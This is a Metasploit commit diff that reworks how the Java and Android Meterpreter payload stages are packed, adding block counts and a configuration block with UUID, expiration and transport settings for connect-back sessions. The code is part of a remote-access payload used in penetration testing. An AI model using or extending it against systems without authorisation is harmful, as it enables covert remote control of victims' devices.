Java config wiring, tweak to include block counts

This commit adjusts the way that the config block is set for java and android because behind the scenes the stageless connect-backs need to know what to discard. as a result of connecting back to staged listeners we need to be able to discard a number of bytes/blocks before we can continue process (at least in the case of TCP).
2015-06-26 13:59:09 +10:00 · 2015-06-26 13:59:09 +10:00 · a773979992
parent 98156ec944
commit a773979992
3 changed files with 63 additions and 32 deletions
--- a/lib/msf/core/payload/java.rb
+++ b/lib/msf/core/payload/java.rb
@ -18,9 +18,9 @@ module Msf::Payload::Java
    stage = ''
    @stage_class_files.each do |path|
      data = MetasploitPayloads.read('java', path)
-      stage << ([data.length].pack("N") + data)
+      stage << [data.length, data].pack('NA*')
    end
-    stage << [0].pack("N")
+    stage << [0].pack('N')

    stage
  end
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@ -15,20 +15,16 @@ module Metasploit4

  def initialize(info = {})
    super(update_info(info,
-      'Name'      => 'Android Meterpreter',
+      'Name'        => 'Android Meterpreter',
      'Description' => 'Run a meterpreter server on Android',
-      'Author'    => [
-          'mihi', # all the hard work
-          'egypt', # msf integration
-          'anwarelmakrahy' # android extension
-        ],
+      'Author'      => ['mihi', 'egypt', 'anwarelmakrahy', 'OJ Reeves'],
      'Platform'    => 'android',
-      'Arch'      => ARCH_DALVIK,
-      'License'   => MSF_LICENSE,
-      'Session'   => Msf::Sessions::Meterpreter_Java_Android))
+      'Arch'        => ARCH_DALVIK,
+      'License'     => MSF_LICENSE,
+      'Session'     => Msf::Sessions::Meterpreter_Java_Android
+    ))

-    register_options(
-    [
+    register_options([
      OptBool.new('AutoLoadAndroid', [true, "Automatically load the Android extension", true])
    ], self.class)
  end
@ -38,14 +34,20 @@ module Metasploit4
  # used as the final stage
  #
  def generate_stage(opts={})
-    # TODO: wire the UUID into the stage
    clazz = 'androidpayload.stage.Meterpreter'
    metstage = MetasploitPayloads.read("android", "metstage.jar")
    met = MetasploitPayloads.read("android", "meterpreter.jar")

    # Name of the class to load from the stage, the actual jar to load
    # it from, and then finally the meterpreter stage
-    java_string(clazz) + java_string(metstage) + java_string(met) + java_string(generate_config(opts))
+    blocks = [
+      java_string(clazz),
+      java_string(metstage),
+      java_string(met),
+      java_string(generate_config(opts))
+    ]
+
+    (blocks + [blocks.length]).pack('A*' * blocks.length + 'N')
  end

  def generate_config(opts={})
--- a/modules/payloads/stages/java/meterpreter.rb
+++ b/modules/payloads/stages/java/meterpreter.rb
@ -10,7 +10,8 @@ require 'msf/base/sessions/meterpreter_java'
 require 'msf/base/sessions/meterpreter_options'


-module Metasploit3
+module Metasploit4
+
  include Msf::Sessions::MeterpreterOptions

  # The stager should have already included this
@ -18,20 +19,18 @@ module Metasploit3

  def initialize(info = {})
    super(update_info(info,
-      'Name'          => 'Java Meterpreter',
-      'Description'   => 'Run a meterpreter server in Java',
-      'Author'        => [
-          'mihi', # all the hard work
-          'egypt' # msf integration
-        ],
-      'Platform'      => 'java',
-      'Arch'          => ARCH_JAVA,
-      'PayloadCompat' =>
-        {
+      'Name'           => 'Java Meterpreter',
+      'Description'    => 'Run a meterpreter server in Java',
+      'Author'         => ['mihi', 'egypt', 'OJ Reeves'],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'PayloadCompat'  => {
          'Convention' => 'javasocket javaurl',
        },
-      'License'       => MSF_LICENSE,
-      'Session'       => Msf::Sessions::Meterpreter_Java_Java))
+      'License'        => MSF_LICENSE,
+      'Session'        => Msf::Sessions::Meterpreter_Java_Java
+    ))
+
    # Order matters.  Classes can only reference classes that have already
    # been sent.  The last .class must implement Stage, i.e. have a start()
    # method.
@ -54,12 +53,42 @@ module Metasploit3
  # used as the final stage; calls super to get the intermediate stager.
  #
  def generate_stage(opts={})
-    # TODO: wire the UUID into the stage
    met = MetasploitPayloads.read('meterpreter', 'meterpreter.jar')
+    config = generate_config(opts)

-    # All of the dendencies to create a jar loader, followed by the length
-    # of the jar and the jar itself.
-    super(opts) + [met.length].pack("N") + met
+    # All of the dependencies to create a jar loader, followed by the length
+    # of the jar and the jar itself, then the config
+    blocks = [
+      super(opts),
+      [met.length, met].pack('NA*'),
+      [config.length, config].pack('NA*')
+    ]
+
+    # Deliberate off by 1 here. The call to super adds a null terminator
+    # so we would add 1 for the null terminate and remove one for the call
+    # to super.
+    block_count = blocks.length + @stage_class_files.length
+
+    # Pack all the magic together
+    (blocks + [block_count]).pack('A*' * blocks.length + 'N')
  end

+  def generate_config(opts={})
+    opts[:uuid] ||= generate_payload_uuid
+
+    # create the configuration block, which for staged connections is really simple.
+    config_opts = {
+      ascii_str:  true,
+      arch:       opts[:uuid].arch,
+      expiration: datastore['SessionExpirationTimeout'].to_i,
+      uuid:       opts[:uuid],
+      transports: [transport_config(opts)]
+    }
+
+    # create the configuration instance based off the parameters
+    config = Rex::Payloads::Meterpreter::Config.new(config_opts)
+
+    # return the XML version of it
+    config.to_b
+  end
 end